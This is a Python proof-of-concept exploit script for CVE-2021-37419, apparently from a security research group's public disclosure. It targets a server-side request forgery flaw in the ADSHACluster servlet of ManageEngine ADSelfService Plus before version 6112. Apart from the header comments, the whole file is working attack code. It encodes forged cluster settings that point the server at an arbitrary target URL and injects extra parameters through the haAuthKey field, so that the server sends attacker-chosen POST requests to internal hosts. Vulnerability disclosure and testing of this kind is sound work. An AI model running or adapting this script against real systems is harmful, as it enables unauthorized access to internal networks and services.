#
# STM Cyber R&D
# https://blog.stmcyber.com
#
# Exploit Title: ManageEngine ADSelfService Plus - SSRF vulnerability in /servlet/ADSHACluster endpoint
# Exploit Author: Krzysztof Andrusiak, Marcin Ogorzelski
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: < 6112
# Tested on: Windows Server 2019
# CVE: CVE-2021-37419

import json
import base64

import requests

ADSSP_URL = "http://192.168.100.102:8888" # ADSSP server URL
TARGET_URL = "https://192.168.100.101:8080/myOwnAPI" # address to which POST request will be sent
PARAMS = "param1=test&param2=test" # parameters which will be included in POST request body

cluster_settings = {
    "MASTER_SERVER_URL": TARGET_URL + "#",
    "HA_PRODUCT": None,
    "RESTART_SLAVE": True
}

params = {
    "MTCALL": "restart",
    "CLUSTER_SETTINGS": base64.b64encode(json.dumps(cluster_settings).encode('utf-8')),
    "haAuthKey": "1&" + PARAMS
}

requests.post(ADSSP_URL.rstrip('/') + '/servlet/ADSHACluster', params=params)